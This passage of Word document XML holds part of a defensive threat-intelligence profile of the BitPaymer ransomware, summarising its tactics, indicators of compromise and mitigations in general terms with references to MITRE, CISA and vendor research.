          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="456C011A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1381F7AE" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0776F8" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Attackers commonly obtain elevated privileges before ransomware deployment using stolen credentials, administrative tools, or exploitation techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="30111B83" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7329C5" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C1656E9" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses obfuscation, disables security tools, stops services, deletes shadow copies, and attempts to impair recovery mechanisms to maximize encryption impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="287E35A3" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B59359A" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486A1396" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>BitPaymer itself does not primarily focus on credential theft, though attackers associated with campaigns often use credential dumping tools before deployment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="2765FCDA" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CDC8762" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="034273ED" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enumerates files, directories, network shares, and system information to identify valuable targets for encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="38CE501B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA2020E" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783588CE" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Commonly deployed across enterprise networks after attackers move laterally using RDP, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>PsExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>, SMB shares, or stolen administrative credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="2E045755" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DE3ECA8" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BFAC280" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Limited traditional C2 functionality after deployment; ransomware operators generally control operations manually during pre-encryption stages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="5EB0EAFC" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77971F82" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BA0B0F0" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Early BitPaymer campaigns focused primarily on encryption rather than exfiltration, though related groups have later adopted data theft and double-extortion tactics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="5869542D" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4433B2DE" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E61C904" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Causes widespread operational disruption, file encryption, downtime, financial loss, and potential data exposure. Enterprise-wide infections can severely affect critical business operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="6A592B54" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BCF2540" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D4FF76" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Mass file encryption activity, ransom notes, disabled security services, deleted shadow copies, suspicious PowerShell or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>PsExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> activity, abnormal SMB traffic, and unexpected file extensions appended to encrypted files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="05C1ED20" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E03112" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C76D89" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Use offline backups, enable ransomware behavior detection, restrict RDP exposure, monitor lateral movement activity, apply network segmentation, enforce least privilege, use EDR solutions, monitor shadow copy deletion commands, and maintain timely patch management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4494" w:rsidRPr="003168F2" w14:paraId="0BAC9C3A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB29B9E" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E09090B" w14:textId="77777777" w:rsidR="009B4494" w:rsidRPr="003168F2" w:rsidRDefault="009B4494" w:rsidP="009B4494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId58" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK BitPaymer S0570</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId59" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId60" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>CISA Ransomware Guidance</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId61" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>CrowdStrike Ransomware Research</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId62" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Mandiant Threat Intelligence</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E06C901" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E75DEC" w14:textId="2C335B31" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidSect="006537E8">
      <w:footerReference w:type="default" r:id="rId63"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="624" w:right="624" w:bottom="624" w:left="624" w:header="709" w:footer="709" w:gutter="0"/>
      <w:pgBorders w:offsetFrom="page">
        <w:top w:val="single" w:sz="12" w:space="24" w:color="auto"/>
        <w:bottom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9F21E" w14:textId="77777777" w:rsidR="00CC2890" w:rsidRDefault="00CC2890" w:rsidP="006537E8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="47EDFE77" w14:textId="77777777" w:rsidR="00CC2890" w:rsidRDefault="00CC2890" w:rsidP="006537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5390D" w14:textId="77777777" w:rsidR="003168F2" w:rsidRDefault="003168F2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="156082" w:themeColor="accent1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
